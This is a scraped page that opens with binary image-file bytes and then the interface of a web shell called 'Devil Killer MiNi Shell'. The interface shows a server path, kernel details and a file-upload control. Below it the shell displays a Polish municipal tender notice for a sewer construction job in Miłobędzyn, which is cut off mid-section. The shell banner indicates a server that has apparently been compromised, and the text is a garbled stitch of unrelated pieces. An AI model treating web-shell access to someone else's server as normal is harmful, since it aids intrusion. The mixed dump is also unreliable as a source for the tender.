JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241120/0060431601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sieci kanalizacji sanitarnej odprowadzającej oczyszczone ścieki z oczyszczalni ścieków w m. Miłobędzyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biskupa Floriana 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 275 57 01</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 275 57 01 w. 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@gmina.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina.sierpc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sieci kanalizacji sanitarnej odprowadzającej oczyszczone ścieki z oczyszczalni ścieków w m. Miłobędzyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c29c0e2f-e1f0-4ef7-9e89-d67026570d04</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00604316</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00051758/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budowa sieci kanalizacji sanitarnej odprowadzającej oczyszczone ścieki z oczyszczalni ścieków w m. Miłobędzyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c29c0e2f-e1f0-4ef7-9e89-d67026570d04 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu komunikacja między Zamawiającym <br/> a Wykonawcami odbywa się przy użyciu: Platformy e-Zamówienia, która jest dostępna pod <br/> adresem: https://ezamowienia.gov.pl<br/>2. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio <br/> do widoku postępowania na Platformie e-Zamówienia:<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-c29c0e2f-e1f0-4ef7-9e89-d67026570d04<br/>3. Sposób komunikowania się za pośrednictwem Platformy e-Zamówienia został opisany pod <br/> adresem: https://ezamowienia.gov.pl<br/>4. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy <br/> i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza <br/> komunikację za pomocą (nie dotyczy składania ofert):<br/> - Elektronicznej Skrzynki Podawczej ePUAPu Urzędu Gminy w Sierpcu pod adresem:<br/> /3f4ih06ymt/SkrytkaESP<br/> - poczty elektronicznej na adres e-mail: architektura@gmina.sierpc.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania <br/> konta na Platformie e-Zamówienia ani logowania.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, <br/> musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe <br/> informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy<br/> e-Zamówienia określa „Regulamin Platformy e-Zamówienia”, dostępny na stronie internetowej <br/> https://ezamowienia.gov.pl oraz zamieszczone w zakładce „Centrum pomocy”.<br/>3. Komunikacja w postępowaniu, przy użyciu platformy e-Zamówienia, z wyłączeniem składania <br/> ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych <br/> w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy <br/> do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie <br/> pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie <br/> załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>4. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady <br/> Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym <br/> podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, <br/> zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie <br/> zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub <br/> wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) <br/> dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ <br/> zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie <br/> wymaga posiadania konta „Wykonawca” na Platformie e-Zamówienia oraz zalogowania się <br/> na Platformie e – Zamówienia. Do korzystania z „Formularzy do komunikacji” służących <br/> do zadawania pytań dotyczących treści dokumentów zamówienia (dotyczy w szczególności <br/> SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są <br/> po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” <br/> wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego <br/> formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług <br/> Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin <br/> Platformy e-Zamówienia.<br/>9. Za datę przekazania oferty, oświadczeń, podmiotowych środków dowodowych, przedmiotowych <br/> środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych <br/> w postępowaniu, przyjmuje się datę ich przekazania na Platformę e-Zamówienia.<br/>10. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy <br/> e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod <br/> numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony <br/> na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>11. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących <br/> kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być <br/> zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów <br/> w sprawie wymagań dla dokumentów elektronicznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Sierpcu jest <br/> Wójt Gminy Sierpc, ul. Biskupa Floriana 4, 09-200 Sierpc; <br/>2. Administrator – Wójt Gminy Sierpc wyznaczył Inspektora Danych Osobowych, z którym <br/> można się kontaktować pod numerem telefonu: (24) 275 57 01, adres e-mail: <br/> iod@gmina.sierpc.pl <br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie <br/> podstawowym na roboty budowlane pn.: „Budowa sieci kanalizacji sanitarnej odprowadzającej <br/> oczyszczone ścieki z oczyszczalni ścieków w m. Miłobędzyn”.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/> zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp; <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 lat od <br/> dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza <br/> 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących <br/> jest wymogiem ustawowym określonym w przepisanych ustawy pzp, związanym z udziałem <br/> w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych <br/> danych wynikają z ustawy pzp;<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO. <br/>8. Posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/> Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana <br/> danych osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora <br/> ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania<br/> o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 <br/> ust. 2 RODO; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/> gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/> RODO; <br/>9. Nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia <br/> danych osobowych; b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 <br/> RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/> osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 <br/> lit. c RODO;<br/>10. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO <br/> przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla <br/> przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>11. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, <br/> do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO<br/> i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. <br/> Do obowiązków tych należą:<br/>11.1. Obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane <br/> osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał <br/> zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego,<br/>11.2. Obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane <br/> wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu <br/> w treści oferty lub dokumentów składanych na żądanie zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Nazwa nadana zamówieniu przez Zamawiającego: „Budowa sieci kanalizacji sanitarnej <br/> odprowadzającej oczyszczone ścieki z oczyszczalni ścieków w m. Miłobędzyn”.<br/>2. Przedmiot zamówienia realizowany będzie na działkach o nr ewid. 129 i 126/4 obręb 0022 <br/> Miłobędzyn, gmina Sierpc, powiat sierpecki, województwo mazowieckie.<br/>3. W ramach robót budowlanych należy wykonać budowę kanalizacji sanitarnej w miejscowości <br/> Miłobędzyn z rur PVC 250 klasy S SDR 34 litych o długości łącznej 282 mb., na której<br/> zaprojektowano studnie kanalizacyjne betonowe DN 1200 w ilości 2 sztuk oraz studnie <br/> kanalizacyjne PCV DN 600 w ilości 2 sztuk.<br/>4. Wykonawca w ramach przedmiotu zamówienia na własny koszt zapewni <br/> a) kierownika robót w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, <br/> gazowych, wodociągowych i kanalizacyjnych, takimi jak: sieci i instalacje cieplne, <br/> wentylacyjne, gazowe, wodociągowe i kanalizacyjne bez ograniczeń;<br/> b) uprawnionego geodetę do sprawowania pełnej obsługi geodezyjnej podczas wykonywania <br/> robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie kierował się kryteriami oceny ofert:<br/>1) „Cena” (C) – waga kryterium 60 %;<br/>2) „Okres gwarancji i rękojmi” (GR) – waga kryterium 40 %<br/><br/>2. Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu <br/> zamówienia, podanej przez Wykonawcę w formularzu oferty. <br/><br/> Zamawiający przyzna punkty wg następującego wzoru:<br/><br/> Cena najniższa brutto*<br/>C = ------------------------------------- x 100 pkt x 60%<br/> Cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>3. Kryterium - „Okres gwarancji i rękojmi” będzie rozpatrywane na podstawie okresu gwarancji <br/> jakości i rękojmi na roboty objęte przedmiotem zamówienia, podanej przez Wykonawcę <br/> w formularzu oferty, punktowany będzie wg. poniższego schematu na podstawie wskazanego <br/> terminu w formularzu oferty:<br/><br/> GR o – GR min<br/>GR = ------------------ x 100 pkt x 40%<br/> GR max – GR min<br/>Gdzie:<br/>GR max – gwarancja i rękojmia maksymalna (60 m-cy),<br/>GR min – gwarancja i rękojmia minimalna (36 m-cy),<br/>GR o – gwarancja i rękojmia oferty ocenianej (w miesiącach).<br/>Termin gwarancji i rękojmi należy proponować w pełnych miesiącach.<br/>UWAGA: Maksymalna liczba 40 punktów zostanie przyznana za udzielenie 60 m-cy lub <br/> dłuższej gwarancji i rękojmi na wykonany przedmiot zamówienia. W przypadku <br/> zaoferowania gwarancji i rękojmi dłuższej niż 60 m-cy, do oceny kryterium będzie brany <br/> okres gwarancji i rękojmi maksymalny.<br/><br/>Minimalny okres gwarancji jakości rękojmi dla robót budowlanych – 36 m-cy. Zaoferowanie krótszego okresu gwarancji spowoduje odrzucenie oferty. Jeżeli Wykonawca nie wypełni zobowiązania dotyczącego okresu gwarancji i rękojmi, Zamawiający uzna, że okres gwarancji i rękojmi został udzielony na 36 miesięcy. Każdy kolejny miesiąc nie spowoduje zwiększenia ilości przyznanych punktów.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę <br/> punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium, <br/> obliczonych wg wzoru:<br/>P = C + GR<br/>gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>G – liczba punktów przyznana ofercie ocenianej w kryterium „Okres Gwarancji i Rękojmi”<br/>P – łączna liczba punktów przyznana ofercie ocenianej<br/><br/>5. Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożyli ofertę niepodlegającą <br/> odrzuceniu na podstawie art. 226 ust. 1 ustawy Pzp w tym przede wszystkim spełniają warunki <br/> udziału w postępowaniu i nie podlegają wykluczeniu na zasadach określonych w SWZ.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału <br/> w postępowaniu dotyczące:<br/>2.1. Zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/> o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3. Sytuacji ekonomicznej lub finansowej:<br/> Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli jest ubezpieczony od <br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem <br/> zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 200.000,00 zł (słownie: <br/> dwieście tysięcy złotych 00/100).<br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana<br/> przez Zamawiającego, w oparciu o informacje zawarte w:<br/> - formularzu ofertowym według załącznika nr 1 do SWZ;<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu według załącznika nr 2 do SWZ;<br/> - oświadczeniu Podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu<br/> według załącznika nr 2a do SWZ;<br/> - zobowiązaniu innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów <br/> na okres korzystania z nich przy wykonywaniu zamówienia według załącznika nr 5 do SWZ;<br/> - dokumencie potwierdzającym, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej <br/> w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną <br/> min. 200.000,00 zł (przez „opłaconą” polisę Zamawiający rozumie załączenie wraz z polisą <br/> ubezpieczeniową dowodu potwierdzającego uiszczenie składki za tą polisę ubezpieczeniową <br/> od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem <br/> zamówienia).<br/>2.4. zdolności technicznej lub zawodowej:<br/>2.4.1. potencjał techniczny:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4.2. potencjał zawodowy:<br/> 1) W zakresie osób zdolnych do 